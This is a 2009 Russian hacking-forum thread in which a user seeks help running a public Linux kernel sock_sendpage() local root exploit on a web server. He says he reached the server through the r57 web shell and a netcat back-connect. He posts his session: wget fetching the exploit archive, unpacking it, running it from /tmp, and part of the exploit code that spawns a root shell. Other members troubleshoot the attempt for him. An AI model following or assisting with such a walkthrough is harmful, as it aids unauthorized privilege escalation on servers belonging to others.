ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]
  #1  
Старый 02.11.2009, 18:36
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
Question Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]

Скачал сплоит под Linux
http://milw0rm.com/exploits/9641
Помогите разобраться с его использованием.
Необходимо получить рута на
Цитата:
uname -a: Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10
EDT 2009 i686
Запускаю netcat и через r57 с помощью back-connect'а получаю консоль, далее:
Цитата:
Cmd line: -l -p 11457
Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31
11:01:10 EDT 2009 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
cd /tmp/
mkdir logs
cd /tmp/logs
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
--08:23:23-- http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
=> `2009-linux-sendpage3.tar.gz'
Resolving milw0rm.com... 66.227.17.18
Connecting to milw0rm.com|66.227.17.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,871 (3.8K) [application/x-gzip]

0K ... 100% 3.42 MB/s

08:23:23 (3.42 MB/s) - `2009-linux-sendpage3.tar.gz' saved [3871/3871]

tar xvfz ./*tar.gz
linux-sendpage3/
linux-sendpage3/sesearch-mmap_zero
linux-sendpage3/run
linux-sendpage3/exploit-pulseaudio.c
linux-sendpage3/exploit.c
linux-sendpage3/runcon-mmap_zero
cd ./linux-*
chmod 0777 ./*
ls -lia
total 36
98307 drwxr-xr-x 2 apache apache 4096 Sep 10 20:47 .
98305 drwxr-xr-x 3 apache apache 4096 Nov 2 08:24 ..
98310 -rwxrwxrwx 1 apache apache 358 Sep 10 20:57 exploit-pulseaudio.c
98311 -rwxrwxrwx 1 apache apache 9113 Sep 10 14:36 exploit.c
98309 -rwxrwxrwx 1 apache apache 1127 Sep 10 22:00 run
98312 -rwxrwxrwx 1 apache apache 1068 Sep 10 14:01 runcon-mmap_zero
98308 -rwxrwxrwx 1 apache apache 1018 Sep 6 19:44 sesearch-mmap_zero
sh run
run: line 33: ./exploit: Permission denied
Подскажите пожалуйста что не так делаю?
 
Ответить с цитированием

  #2  
Старый 02.11.2009, 23:45
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

еще раз ls -la и mount сюда
 
Ответить с цитированием

  #3  
Старый 03.11.2009, 08:15
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Файл exploit скорее всего не является исполняемым
Код:
$ chmod 0755 exploit
 
Ответить с цитированием

  #4  
Старый 03.11.2009, 14:25
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
По умолчанию

Понял свой косяк!!! Спасибо за наводку ShAnKaR

Код:
mount
/dev/sda5 on / type ext3 (rw)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /boot type ext3 (rw)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol

Последний раз редактировалось M@rtein; 03.11.2009 в 14:47..
 
Ответить с цитированием

  #5  
Старый 04.11.2009, 22:52
Аватар для Ruskey
Ruskey
Новичок
Регистрация: 16.11.2006
Сообщений: 20
Провел на форуме:
589436

Репутация: 14
По умолчанию

Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol

Ну что, теперь открой исходник и посмотри логику, которая ведет к данному сообщению. (капитан очевидность)
 
Ответить с цитированием

  #6  
Старый 05.11.2009, 10:58
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
Question

Ruskey, полагаю в exploit.c возникает в условии, но что подправить я не знаю...
Код:
exploit:
	if (s[i][0] == PF_MAX)
		exit(EXIT_FAILURE);

	if ((out_fd = socket(s[i][0], s[i][1], s[i][2])) == -1) {
		perror("socket");
		i++;
		goto exploit;
	}

	sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

	if (getuid() || getgid()) {
		close(out_fd);
		i++;
		goto exploit;
	}

	execl("/bin/sh", "sh", "-i", NULL);

	exit(EXIT_SUCCESS);
}
 
Ответить с цитированием

  #7  
Старый 11.11.2009, 15:39
Аватар для Ex@rcist
Ex@rcist
Новичок
Регистрация: 04.09.2009
Сообщений: 23
Провел на форуме:
68004

Репутация: 10
По умолчанию

/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..
 
Ответить с цитированием

  #8  
Старый 12.11.2009, 01:21
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ex@rcist  
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..
кажется ты опоздал )
 
Ответить с цитированием

  #9  
Старый 12.11.2009, 18:24
Аватар для oRb
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

M@rtein
Информация об уязвимости была опубликована 13 августа (патч был сделан в тот же день). А ваше ядро было собрано 31го. Отсюда вывод: рута через этот сплойт не получить.
__________________
включи голову
 
Ответить с цитированием

  #10  
Старый 13.11.2009, 15:55
Аватар для M@rtein
M@rtein
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме:
389103

Репутация: 15
По умолчанию

oRb спасибо за ответ. Теперь буду это учитывать.

И кстати вот тоже может кто подскажет по XNU Darwin.
Ссылка на тему на ачате http://forum.antichat.ru/showthread.php?t=135264

Последний раз редактировалось M@rtein; 13.11.2009 в 16:01..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Linux books nerezus *nix 68 23.01.2010 00:31
[ Обзор уязвимостей Linux Kernel ] FraiDex *nix 3 10.09.2009 08:01
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ